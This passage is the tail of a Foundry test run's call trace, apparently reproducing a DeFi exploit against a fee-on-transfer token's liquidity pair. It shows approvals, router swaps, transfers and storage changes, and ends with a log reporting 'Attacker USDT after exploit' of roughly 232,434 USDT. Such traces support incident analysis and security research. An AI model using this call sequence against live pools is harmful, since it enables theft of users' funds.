    │   │   │   │   ├─ emit Transfer(from: 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, to: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF, value: 478348772802787754081201 [4.783e23])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x80a5e16cd7a6626c482f9b77b3cef351c7968037b145aeb5cecf3d8642c6fef8: 0x000000000000000000000000000000000000000000000bc2eb495a0290754413 → 0x00000000000000000000000000000000000000000000710e420db9ba48a8bfc4
    │   │   │   │   │   @ 0x33cb5cd445432f9f54dfb8443564053d68e035bd9032963bbc31a4b48e703c27: 0x000000000000000000000000000000000000000000001bb62b5b21a89a33216c → 0x000000000000000000000000000000000000000000001dc7615f239cada1e540
    │   │   │   │   │   @ 0xc82a3b67d2d8fcd4b7e14a8177520f300b53e2cfea7fb6fc350b7b4a96b11c9e: 0x00000000000000000000000000000000000000000000c28bc73ee2e5aba1ec45 → 0x000000000000000000000000000000000000000000005b2f3a768139dfffacc0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55) [staticcall]
    │   │   │   │   └─ ← [Return] 240262002184320286223559 [2.402e23]
    │   │   │   ├─ [465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::balanceOf(0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55) [staticcall]
    │   │   │   │   └─ ← [Return] 430606559609189086244032 [4.306e23]
    │   │   │   ├─ emit Sync(reserve0: 240262002184320286223559 [2.402e23], reserve1: 430606559609189086244032 [4.306e23])
    │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 127800000000000000000000 [1.278e23], amount1In: 0, amount0Out: 0, amount1Out: 488110992655905871511429 [4.881e23], to: 0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 10: 0x00000000000000000000000000000000225f5e7fa6f6cb2e84850f373ea6696b → 0x000000000000000000000000000000002261d13f6fb39772e03b961ed3f3fbc3
    │   │   │   │   @ 9: 0x0000000000000000000000000000001630e9434099859d5b3b23f6228870c822 → 0x00000000000000000000000000000016318ca53c6bc021a260b55784e98f8b62
    │   │   │   │   @ 8: 0x667d742000000000c28bc73ee2e5aba1ec450000000017d093cd816a2f346cc7 → 0x667d7434000000005b2f3a768139dfffacc00000000032e0a115a7feb9146cc7
    │   │   │   └─ ← [Stop]
    │   │   ├─ [465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::balanceOf(0x566777eD780dbbe17c130AE97b9FbC0A3Ab829DF) [staticcall]
    │   │   │   └─ ← [Return] 533890426645892777426884 [5.338e23]
    │   │   └─ ← [Stop]
    │   ├─  storage changes:
    │   │   @ 6: 0x000000000000000000000000000000000000000000001b100d48269489e00000 → 0
    │   │   @ 0x3d78cd8671a4ef696e2fba85d28f7ed4e5c728e5c16abca7b7cc6f5a9b5904ef: 0 → 0x000000000000000000000000000000000000000000001b100d48269489e00000
    │   └─ ← [Stop]
    ├─ [465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 3230811836560608254166000 [3.23e24]
    ├─ [24465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 3230811836560608254166000 [3.23e24])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 3230811836560608254166000 [3.23e24])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0x00000000000000000000000000000000000000000002ac26a91d6123109f03f0
    │   └─ ← [Return] true
    ├─ [38178] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(3230811836560608254166000 [3.23e24], 0, [0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1719497780 [1.719e9])
    │   ├─ [10271] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, 3230811836560608254166000 [3.23e24])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x719a516a38d8711477E6c47Bf70ab3bd52Cb52Ab, value: 64616236731212165083320 [6.461e22])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, value: 3166195599829396089082680 [3.166e24])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000002ac26a91d6123109f03f0 → 0
    │   │   │   @ 0xc82a3b67d2d8fcd4b7e14a8177520f300b53e2cfea7fb6fc350b7b4a96b11c9e: 0x000000000000000000000000000000000000000000005b2f3a768139dfffacc0 → 0x00000000000000000000000000000000000000000002f9a70927c6d1ffa5bff8
    │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0x00000000000000000000000000000000000000000002ac26a91d6123109f03f0 → 0
    │   │   │   @ 0x33cb5cd445432f9f54dfb8443564053d68e035bd9032963bbc31a4b48e703c27: 0x000000000000000000000000000000000000000000001dc7615f239cada1e540 → 0x000000000000000000000000000000000000000000002b763bcb3f279e9ad5f8
    │   │   └─ ← [Return] true
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 21000000000000000000000 [2.1e22]
    │   ├─ [893] 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55::getReserves() [staticcall]
    │   │   └─ ← [Return] 240262002184320286223559 [2.402e23], 430606559609189086244032 [4.306e23], 1719497780 [1.719e9]
    │   ├─ [465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::balanceOf(0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55) [staticcall]
    │   │   └─ ← [Return] 3596802159438585175326712 [3.596e24]
    │   ├─ [18295] 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55::swap(211434568033898910189735 [2.114e23], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 211434568033898910189735 [2.114e23])
    │   │   │   ├─ emit Transfer(from: 0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 211434568033898910189735 [2.114e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xc82a3b67d2d8fcd4b7e14a8177520f300b53e2cfea7fb6fc350b7b4a96b11c9e: 0x0000000000000000000000000000000000000000000032e0a115a7feb9146cc7 → 0x00000000000000000000000000000000000000000000061abd03a18426c06420
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000472698b413b43200000 → 0x0000000000000000000000000000000000000000000031384d9d47b5d57408a7
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55) [staticcall]
    │   │   │   └─ ← [Return] 28827434150421376033824 [2.882e22]
    │   │   ├─ [465] 0xe38593e7F4f2411E0C0aB74589A7209681ab4B1d::balanceOf(0x1aaA8e1Fd2f4137bbf83bD40D08746ce2862ed55) [staticcall]
    │   │   │   └─ ← [Return] 3596802159438585175326712 [3.596e24]
    │   │   ├─ emit Sync(reserve0: 28827434150421376033824 [2.882e22], reserve1: 3596802159438585175326712 [3.596e24])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 3166195599829396089082680 [3.166e24], amount0Out: 211434568033898910189735 [2.114e23], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x667d7434000000005b2f3a768139dfffacc00000000032e0a115a7feb9146cc7 → 0x667d743400000002f9a70927c6d1ffa5bff800000000061abd03a18426c06420
    │   │   └─ ← [Stop]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 232434568033898910189735 [2.324e23]
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 232434568033898910189735 [2.324e23]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDT after exploit", val: 232434568033898910189735 [2.324e23], decimals: 18)
    ├─  storage changes:
    │   @ 6: 0 → 0x000000000000000000000000000000000000000000001b100d48269489e00000
    │   @ 0: 2 → 1
    │   @ 0x8687c7afa1ac13bdd7599515cfe9f9efde344c5b42f831322cf14d5877b9ec93: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0x00000000000000000000000000000000000000000002ac26a91d6123109f03f0
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 13.44s (11.69s CPU time)

Ran 2 test suites in 14.29s (13.89s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
